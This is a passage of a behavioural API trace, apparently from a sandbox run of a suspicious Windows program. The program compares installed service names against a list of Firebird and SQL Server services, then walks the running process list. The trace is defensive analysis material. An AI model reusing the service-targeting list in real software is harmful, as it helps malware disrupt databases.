lpString2="lmhosts") returned 1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.601] lstrlenW (lpString="LSM") returned 3 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0049.601] lstrlenW (lpString="MpsSvc") returned 6 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.601] lstrlenW (lpString="NcbService") returned 10 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0049.601] lstrlenW (lpString="netprofm") returned 8 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.601] lstrlenW (lpString="NlaSvc") returned 6 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.601] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.601] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.601] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.601] lstrlenW (lpString="nsi") returned 3 [0049.601] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.601] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.602] lstrlenW (lpString="PcaSvc") returned 6 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.602] lstrlenW (lpString="PlugPlay") returned 8 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.602] lstrlenW (lpString="Power") returned 5 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.602] lstrlenW (lpString="ProfSvc") returned 7 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.602] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.602] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.602] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.602] lstrlenW (lpString="RpcSs") returned 5 [0049.602] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.602] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.602] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.603] lstrlenW (lpString="SamSs") returned 5 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.603] lstrlenW (lpString="Schedule") returned 8 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.603] lstrlenW (lpString="SecurityHealthService") returned 21 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0049.603] lstrlenW (lpString="SENS") returned 4 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.603] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.603] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.603] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.603] lstrlenW (lpString="Spooler") returned 7 [0049.603] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.603] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.603] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.604] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.604] lstrlenW (lpString="SSDPSRV") returned 7 [0049.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0049.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0049.604] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0049.604] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0049.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0049.604] lstrlenW (lpString="StateRepository") returned 15 [0049.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0049.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0049.604] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0049.604] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0049.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0049.604] lstrlenW (lpString="SysMain") returned 7 [0049.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.604] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.604] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.604] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.604] lstrlenW (lpString="SystemEventsBroker") returned 18 [0049.604] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0049.604] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0049.604] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0049.604] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0049.604] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0049.604] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0049.723] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.724] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.725] lstrlenW (lpString="System") returned 6 [0049.725] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.725] lstrlenW (lpString="smss.exe") returned 8 [0049.725] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.726] lstrlenW (lpString="csrss.exe") returned 9 [0049.726] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.727] lstrlenW (lpString="wininit.exe") returned 11 [0049.727] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.728] lstrlenW (lpString="csrss.exe") returned 9 [0049.728] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.728] lstrlenW (lpString="winlogon.exe") returned 12 [0049.728] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.729] lstrlenW (lpString="services.exe") returned 12 [0049.729] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.730] lstrlenW (lpString="lsass.exe") returned 9 [0049.730] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.731] lstrlenW (lpString="svchost.exe") returned 11 [0049.731] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0049.731] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0049.731] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0049.758] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0049.758] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.759] lstrlenW (lpString="svchost.exe") returned 11 [0049.759] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.759] lstrlenW (lpString="dwm.exe") returned 7 [0049.759] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.760] lstrlenW (lpString="svchost.exe") returned 11 [0049.760] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.761] lstrlenW (lpString="svchost.exe") returned 11 [0049.761] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.761] lstrlenW (lpString="svchost.exe") returned 11 [0049.761] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.762] lstrlenW (lpString="svchost.exe") returned 11 [0049.762] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.762] lstrlenW (lpString="svchost.exe") returned 11 [0049.763] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.772] lstrlenW (lpString="svchost.exe") returned 11 [0049.772] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.773] lstrlenW (lpString="svchost.exe") returned 11 [0049.773] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.773] lstrlenW (lpString="svchost.exe") returned 11 [0049.773] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.774] lstrlenW (lpString="svchost.exe") returned 11 [0049.774] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.775] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.775] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.775] lstrlenW (lpString="svchost.exe") returned 11 [0049.775] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.776] lstrlenW (lpString="svchost.exe") returned 11 [0049.776] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.777] lstrlenW (lpString="audiodg.exe") returned 11 [0049.777] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0049.777] lstrlenW (lpString="sihost.exe") returned 10 [0049.777] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.778] lstrlenW (lpString="svchost.exe") returned 11 [0049.778] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.779] lstrlenW (lpString="taskhostw.exe") returned 13 [0049.779] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0049.780] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0049.780] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0049.780] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0049.780] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.781] lstrlenW (lpString="explorer.exe") returned 12 [0049.781] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0049.782] lstrlenW (lpString="Memory Compression") returned 18 [0049.782] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0049.782] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0049.782] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0049.783] lstrlenW (lpString="SearchUI.exe") returned 12 [0049.783] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0049.784] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0049.784] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.784] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.784] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.785] lstrlenW (lpString="taskhostw.exe") returned 13 [0049.785] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0049.786] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0049.786] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0049.787] lstrlenW (lpString="UsoClient.exe") returned 13 [0049.787] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0049.788] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0049.788] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0049.788] lstrlenW (lpString="taskhostw.exe") returned 13 [0049.788] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: 